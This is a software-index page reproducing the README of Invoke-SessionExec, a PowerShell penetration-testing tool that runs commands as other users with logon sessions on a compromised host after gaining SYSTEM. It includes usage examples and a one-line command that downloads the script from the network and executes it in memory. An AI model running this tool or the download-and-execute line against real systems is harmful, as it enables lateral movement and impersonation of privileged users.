Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/the-viper-one/invoke-sessionexec

Execute commands in context of a user logon session
https://github.com/the-viper-one/invoke-sessionexec

lateral pentest powershell sessionexec

Last synced: 4 days ago
JSON representation

Execute commands in context of a user logon session

Host: GitHub
URL: https://github.com/the-viper-one/invoke-sessionexec
Owner: The-Viper-One
Created: 2024-07-23T19:27:44.000Z (6 months ago)
Default Branch: main
Last Pushed: 2024-08-07T07:28:52.000Z (6 months ago)
Last Synced: 2024-08-07T11:14:58.324Z (6 months ago)
Topics: lateral, pentest, powershell, sessionexec
Language: PowerShell
Homepage:
Size: 17.6 KB
Stars: 4
Watchers: 1
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

# Invoke-SessionExec

Invoke-SessionExec is a PowerShell port of Leo4j's SessionExec. https://github.com/Leo4j/SessionExec

Invoke-SessionExec allows you to execute commands in the context of others users from their logon sessions.

For example running as the user "truth" on a compromised host we can see logon sessions for the users administrator and arbiter.

```
C:\Users\truth>quser
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>truth console 1 Active none 23/07/2024 19:43
administrator 2 Disc 20:53 23/07/2024 18:02
arbiter 3 Disc 20:52 23/07/2024 18:03
```

After elevating to SYSTEM and executing Invoke-SessionExec with ```Invoke-SessionExec -SessionID All -Command "whoami"``` we get the following command output from each users with a logon session on the system:

```
[+] Invoke Command as truth under Session ID:1
security\truth

[+] Invoke Command as administrator under Session ID:2
security\administrator

[+] Invoke Command as arbiter under Session ID:3
security\arbiter
```

# Load into memory

```
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/The-Viper-One/Invoke-SessionExec/main/Invoke-SessionExec.ps1')
```

# Usage
```powershell
# Execute as user in Session 1
Invoke-SessionExec -SessionID 1 -Command "whomai /all"

# Execute as all users with logon sessions
Invoke-SessionExec -SessionID All -Command "whoami /all"
```